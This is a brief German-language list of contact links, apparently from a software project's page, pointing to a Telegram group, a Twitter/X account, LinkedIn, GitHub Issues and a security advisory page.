💬 Telegram-GruppeCommunity beitreten
🐦 Twitter/X@ofjaaah
💼 LinkedInVernetzen
🐛 Probleme meldenGitHub Issues
🔐 SicherheitsproblemeSicherheitshinweis